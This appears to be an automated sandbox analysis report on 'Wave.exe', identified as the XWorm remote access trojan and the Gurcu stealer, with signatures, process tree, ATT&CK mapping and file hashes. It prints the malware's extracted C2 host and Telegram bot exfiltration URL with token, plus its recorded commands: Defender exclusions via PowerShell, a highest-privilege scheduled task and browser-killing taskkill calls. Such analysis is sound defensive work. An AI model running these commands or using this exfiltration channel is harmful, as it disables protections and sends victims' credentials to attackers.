Overview

overview

10

Static

static

3

Wave.exe

windows7-x64

10

Wave.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 08:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Wave.exe

  • Size

    7.3MB

  • MD5

    92d883d4d144e110b1997924c390e11e

  • SHA1

    c42ab515f865b429016fc16faecf0415d5004e29

  • SHA256

    1297e636f5bcea89e6fc45a6dd05d0464451cc1dca7b423fd652e932dc6408e4

  • SHA512

    c73352005a8034e9f0d044ebb7c9e4a0f97bee99fa0e9c6503ca70743232e1998b52846a0761c6fdab58c29554666e7122660b9da829210f3bb83f32f04981d9

  • SSDEEP

    196608:V4FB96c/z3etLp+v2gwdP2gzmEWSyRy/16aGb3:VM8k3e1xdFqCm2a3

Score
10/10
gurcuxwormdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

courses-disney.gl.at.ply.gg:21335

127.0.0.1:21335
Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage?chat_id=809478226

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage?chat_id=809478226

Signatures

  • Detect Xworm Payload 2 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4864
    • C:\Users\Admin\AppData\Local\Temp\Wave1.exe
      "C:\Users\Admin\AppData\Local\Temp\Wave1.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Wave1.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave1.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2380
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1820
    • C:\Users\Admin\AppData\Local\Temp\Wave2.exe
      "C:\Users\Admin\AppData\Local\Temp\Wave2.exe"
      2⤵
      • Executes dropped EXE
      PID:3972
    • C:\Users\Admin\AppData\Local\Temp\Wave3.exe
      "C:\Users\Admin\AppData\Local\Temp\Wave3.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
        "C:\Users\Admin\AppData\Local\Temp\Wave3.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Maps connected drives based on registry
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
          "C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe" "--multiprocessing-fork" "parent_pid=1828" "pipe_handle=648"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5080
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im opera.exe
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2052
        • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
          "C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe" "--multiprocessing-fork" "parent_pid=1828" "pipe_handle=660"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "taskkill /f /im msedge.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:632
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im msedge.exe
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1552
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            5⤵
              PID:2636
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              5⤵
                PID:4476
            • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
              "C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe" "--multiprocessing-fork" "parent_pid=1828" "pipe_handle=664"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3624
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /f /im brave.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2084
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im brave.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1760
            • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
              "C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe" "--multiprocessing-fork" "parent_pid=1828" "pipe_handle=716"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3716
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1376
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3948
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /f /im browser.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1940
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im browser.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2596
            • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
              "C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe" "--multiprocessing-fork" "parent_pid=1828" "pipe_handle=740"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2468
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3704
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im opera.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3296
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /f /im vivaldi.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1616
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im vivaldi.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4492
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.exe'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3164
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.exe'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4824
      • C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        1⤵
          PID:632
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /7
          1⤵
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5032
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4752
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:2104
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            C:\Users\Admin\AppData\Roaming\svchost.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1284

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Scheduled Task/Job

          1
          T1053

          Scheduled Task

          1
          T1053.005

          Defense Evasion

          Modify Registry

          1
          T1112

          Credential Access

          Unsecured Credentials

          2
          T1552

          Credentials In Files

          2
          T1552.001

          Discovery

          Peripheral Device Discovery

          2
          T1120

          Query Registry

          6
          T1012

          System Information Discovery

          5
          T1082

          Lateral Movement

          Collection

          Data from Local System

          2
          T1005

          Command and Control

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd
            Filesize

            63KB

            MD5

            1c88b53c50b5f2bb687b554a2fc7685d

            SHA1

            bfe6fdb8377498bbefcaad1e6b8805473a4ccbf3

            SHA256

            19dd3b5ebb840885543974a4cb6c8ea4539d76e3672be0f390a3a82443391778

            SHA512

            a312b11c85aaa325ab801c728397d5c7049b55fa00f24d30f32bf5cc0ad160678b40f354d9d5ec34384634950b5d6eda601e21934c929b4bc7f6ef50f16e3f59

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd
            Filesize

            155KB

            MD5

            bc07d7ac5fdc92db1e23395fde3420f2

            SHA1

            e89479381beeba40992d8eb306850977d3b95806

            SHA256

            ab822f7e846d4388b6f435d788a028942096ba1344297e0b7005c9d50814981b

            SHA512

            b6105333bb15e65afea3cf976b3c2a8a4c0ebb09ce9a7898a94c41669e666ccfa7dc14106992502abf62f1deb057e926e1fd3368f2a2817bbf6845eada80803d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd
            Filesize

            77KB

            MD5

            290dbf92268aebde8b9507b157bef602

            SHA1

            bea7221d7abbbc48840b46a19049217b27d3d13a

            SHA256

            e05c5342d55cb452e88e041061faba492d6dd9268a7f67614a8143540aca2bfe

            SHA512

            9ae02b75e722a736b2d76cec9c456d20f341327f55245fa6c5f78200be47cc5885cb73dc3e42e302c6f251922ba7b997c6d032b12a4a988f39bc03719f21d1a5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd
            Filesize

            157KB

            MD5

            0a7eb5d67b14b983a38f82909472f380

            SHA1

            596f94c4659a055d8c629bc21a719ce441d8b924

            SHA256

            3bac94d8713a143095ef8e2f5d2b4a3765ebc530c8ca051080d415198cecf380

            SHA512

            3b78fd4c03ee1b670e46822a7646e668fbaf1ef0f2d4cd53ccfcc4abc2399fcc74822f94e60af13b3cdcb522783c008096b0b265dc9588000b7a46c0ed5973e1

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll
            Filesize

            37KB

            MD5

            d86a9d75380fab7640bb950aeb05e50e

            SHA1

            1c61aaf9022cd1f09a959f7b2a65fb1372d187d7

            SHA256

            68fba9dd89bfad35f8fd657b9af22a8aebda31bffda35058a7f5ae376136e89b

            SHA512

            18437e64061221be411a1587f634b4b8efa60e661dbc35fd96a6d0e7eff812752de0ada755c01f286efefc47fb5f2daf07953b4cfc4119121b6bee7756c88d0f

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\sqlite3.dll
            Filesize

            1.4MB

            MD5

            a98bb13828f662c599f2721ca4116480

            SHA1

            ea993a7ae76688d6d384a0d21605ef7fb70625ee

            SHA256

            6217e0d1334439f1ee9e1093777e9aa2e2b0925a3f8596d22a16f3f155262bf7

            SHA512

            5f1d8c2f52cc976287ab9d952a46f1772c6cf1f2df734e10bbe30ce312f5076ef558df84dce662a108a146a63f7c6b0b5dc7230f96fa7241947645207a6420f4

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd
            Filesize

            1.1MB

            MD5

            2ab7e66dff1893fea6f124971221a2a9

            SHA1

            3be5864bc4176c552282f9da5fbd70cc1593eb02

            SHA256

            a5db7900ecd5ea5ab1c06a8f94b2885f00dd2e1adf34bcb50c8a71691a97804f

            SHA512

            985480fffcc7e1a25c0070f44492744c3820334a35b9a72b9147898395ab60c7a73ea8bbc761de5cc3b6f8799d07a96c2880a7b56953249230b05dd59a1390ad

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Wave1.exe
            Filesize

            83KB

            MD5

            2bebcc27d5c495d9b776162968f42b07

            SHA1

            bfa471133b6a8b74b35fa054e62871c6ce05f873

            SHA256

            dcf95d14fbf8ed9cef6cf7be3e71a753d5334c1be5deaba771d8354f5bd0f5e6

            SHA512

            f6223ebb6ef6b1a4ded6c742ace5d93ea18dece22ff1f18c69003594e0274edd4ff4998fbb6890bdc98b5e3ce5fc08b2ce9aced270017449122f2d7733bba1cc

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Wave2.exe
            Filesize

            5KB

            MD5

            3eafa2fae18c03659154c5f25820776f

            SHA1

            79b86a02bdbb51014a3075efddd2b7568d766773

            SHA256

            66e674645d89818a2aeaad30a0e551ba3e290ef4fd2c7dd5f589e471806b6d59

            SHA512

            d5de994692893d52e656e6e95ef69785a387473411da95c01b87fd65a85201ca4850ed71696f5c1475574ce8e5cf94caf380fe065812596b51933558e585acdb

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Wave3.exe
            Filesize

            7.0MB

            MD5

            1d26687c7641f34244cf49e5ff5e954a

            SHA1

            af5b96231f35f612199bf05955500607efdae540

            SHA256

            7b9e1ae4a057ef5edd8b806e4c6b0e45db5f1135e81690b6920f4eb88d7c86d7

            SHA512

            16dd8816e5f2885ae36234e75f755c9a167e18f876fa8d31299cace4426e610947896bbe1e7045430ec4d500e9162879a60ad879e6cc837660e2ba2e4f809521

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_an2tg2ka.nsj.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\VCRUNTIME140.dll
            Filesize

            106KB

            MD5

            870fea4e961e2fbd00110d3783e529be

            SHA1

            a948e65c6f73d7da4ffde4e8533c098a00cc7311

            SHA256

            76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

            SHA512

            0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_bz2.pyd
            Filesize

            82KB

            MD5

            a8a37ba5e81d967433809bf14d34e81d

            SHA1

            e4d9265449950b5c5a665e8163f7dda2badd5c41

            SHA256

            50e21ce62f8d9bab92f6a7e9b39a86406c32d2df18408bb52ffb3d245c644c7b

            SHA512

            b50f4334acb54a6fba776fc77ca07de4940810da4378468b3ca6f35d69c45121ff17e1f9c236752686d2e269bd0b7bce31d16506d3896b9328671049857ed979

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_ctypes.pyd
            Filesize

            120KB

            MD5

            496dcf8821ffc12f476878775999a8f3

            SHA1

            6b89b8fdd7cd610c08e28c3a14b34f751580cffd

            SHA256

            b59e103f8ec6c1190ded21eef27bea01579220909c3968eeec37d46d2ed39e80

            SHA512

            07118f44b83d58f333bc4b853e9be66dffb3f7db8e65e0226975297bf5794ebdaa2c7a51ef84971faf4d4233a68a6b5e9ac02e737d16c0ac19a6cf65fad9443f

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_elementtree.pyd
            Filesize

            125KB

            MD5

            974d858b12d10c7ee9e8875f20e0e7af

            SHA1

            5f56ee3d0a26ce45857016c329984a1ef121fc61

            SHA256

            a77b2de78310c0b2b4158202ee48734d4835b7ba235aa5f6169f89566357369d

            SHA512

            cf35b43f28048013be4fa87cfbe7fde60a946784a833d3725aa9404502a75254a89d06da605d89fa59c2a84c20b5cfcb74a0a4f0ce2946618c6e495c6a845e08

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_multiprocessing.pyd
            Filesize

            33KB

            MD5

            15291d70d00d36ba9b079a4af91efb1a

            SHA1

            85a17ae766811246cf4b2346b50ba008b3b6d8fe

            SHA256

            25cf4173fb40a3bb197c877742cb5ad13b6ef591b8195d5429a71dc7689f9ab5

            SHA512

            2e96253d9a8978a162e580c3e122ddd0500857582f442a8b39dd34c39004cd7f25f977e710ad160d750502d17cd915f83ae3350fff8fce5aa8984166b0470e71

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_queue.pyd
            Filesize

            31KB

            MD5

            e0cc8c12f0b289ea87c436403bc357c1

            SHA1

            e342a4a600ef9358b3072041e66f66096fae4da4

            SHA256

            9517689d7d97816dee9e6c01ffd35844a3af6cde3ff98f3a709d52157b1abe03

            SHA512

            4d93f23db10e8640cd33e860241e7ea6a533daf64c36c4184844e6cca7b9f4bd41db007164a549e30f5aa9f983345318ff02d72815d51271f38c2e8750df4d77

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_sqlite3.pyd
            Filesize

            117KB

            MD5

            562fecc2467778f1179d36af8554849f

            SHA1

            097c28814722c651f5af59967427f4beb64bf2d1

            SHA256

            88b541d570afa0542135cc33e891650346997d5c99ae170ef724fa46c87d545a

            SHA512

            e106ccdd100d0ce42e909d9a21b1ad3b12aee8350033f249ed4c69b195b00adaf441aa199d9885c9d16488db963c751746ce98786246d96568bade4c707d362a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\_uuid.pyd
            Filesize

            24KB

            MD5

            a16b1acfdaadc7bb4f6ddf17659a8d12

            SHA1

            482982d623d88627c447f96703e4d166f9e51db4

            SHA256

            8af17a746533844b0f1b8f15f612e1cf0df76ac8f073388e80cfc60759e94de0

            SHA512

            03d65f37efc6aba325109b5a982be71380210d41dbf8c068d6a994228888d805adac1264851cc6f378e61c3aff1485cc6c059e83218b239397eda0cec87bd533

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\libcrypto-1_1.dll
            Filesize

            3.3MB

            MD5

            80b72c24c74d59ae32ba2b0ea5e7dad2

            SHA1

            75f892e361619e51578b312605201571bfb67ff8

            SHA256

            eb975c94e5f4292edd9a8207e356fe4ea0c66e802c1e9305323d37185f85ad6d

            SHA512

            08014ee480b5646362c433b82393160edf9602e4654e12cd9b6d3c24e98c56b46add9bf447c2301a2b2e782f49c444cb8e37ee544f38330c944c87397bdd152a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\libssl-1_1.dll
            Filesize

            686KB

            MD5

            86f2d9cc8cc54bbb005b15cabf715e5d

            SHA1

            396833cba6802cb83367f6313c6e3c67521c51ad

            SHA256

            d98dd943517963fd0e790fde00965822aa4e4a48e8a479afad74abf14a300771

            SHA512

            0013d487173b42e669a13752dc8a85b838c93524f976864d16ec0d9d7070d981d129577eda497d4fcf66fc6087366bd320cff92ead92ab79cfcaa946489ac6cb

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\pyexpat.pyd
            Filesize

            194KB

            MD5

            c5c1ca1b3641772e661f85ef0166fd6c

            SHA1

            759a34eca7efa25321a76788fb7df74cfac9ee59

            SHA256

            3d81d06311a8a15967533491783ea9c7fc88d594f40eee64076723cebdd58928

            SHA512

            4f0d2a6f15ebeeb4f9151827bd0c2120f3ca17e07fca4d7661beece70fdcf1a0e4c4ff5300251f2550451f98ea0fdbf45e8903225b7d0cb8da2851cdf62cb8d0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\python311.dll
            Filesize

            5.5MB

            MD5

            1fe47c83669491bf38a949253d7d960f

            SHA1

            de5cc181c0e26cbcb31309fe00d9f2f5264d2b25

            SHA256

            0a9f2c98f36ba8974a944127b5b7e90e638010e472f2eb6598fc55b1bda9e7ae

            SHA512

            05cc6f00db128fbca02a14f60f86c049855f429013f65d91e14ea292d468bf9bfdeebc00ec2d54a9fb5715743a57ae3ab48a95037016240c02aabe4bfa1a2ff4

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\select.pyd
            Filesize

            29KB

            MD5

            4ac28414a1d101e94198ae0ac3bd1eb8

            SHA1

            718fbf58ab92a2be2efdb84d26e4d37eb50ef825

            SHA256

            b5d4d5b6da675376bd3b2824d9cda957b55fe3d8596d5675381922ef0e64a0f5

            SHA512

            2ac15e6a178c69115065be9d52c60f8ad63c2a8749af0b43634fc56c20220afb9d2e71ebed76305d7b0dcf86895ed5cdfb7d744c3be49122286b63b5ebce20c2

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\onefile_3548_133642953018693038\test.exe
            Filesize

            8.4MB

            MD5

            d7802e5bf9fc7cdf60cea7139a6aea54

            SHA1

            40eb6df5d8eb5f3269bf89df8e055a534a730971

            SHA256

            455a15507bf33290a3192b2602c17b60ffe215a43ffe9924f92624b00946e896

            SHA512

            267b2bae1c3ed4c85e4e4ae3144e0f5a9f2fd9c51b2f8cf7c5501ebf3c84aa2952a5264ad3151238a6796a106e62d36418809938b51919b4644606b8ad684328

            Download Submit

          • memory/3440-119-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3440-21-0x00007FFF67033000-0x00007FFF67035000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3440-23-0x0000000000DA0000-0x0000000000DBC000-memory.dmp

            Filesize

            112KB

            Download

          • memory/3440-200-0x00007FFF67033000-0x00007FFF67035000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3440-201-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3972-55-0x0000000000400000-0x0000000000408000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4264-128-0x0000029EDE600000-0x0000029EDE622000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4864-30-0x0000000000400000-0x0000000000B54000-memory.dmp

            Filesize

            7.3MB

            Download

          • memory/5032-223-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-221-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-222-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-228-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-233-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-232-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-231-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-230-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-229-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5032-227-0x000002B43AA80000-0x000002B43AA81000-memory.dmp

            Filesize

            4KB

            Download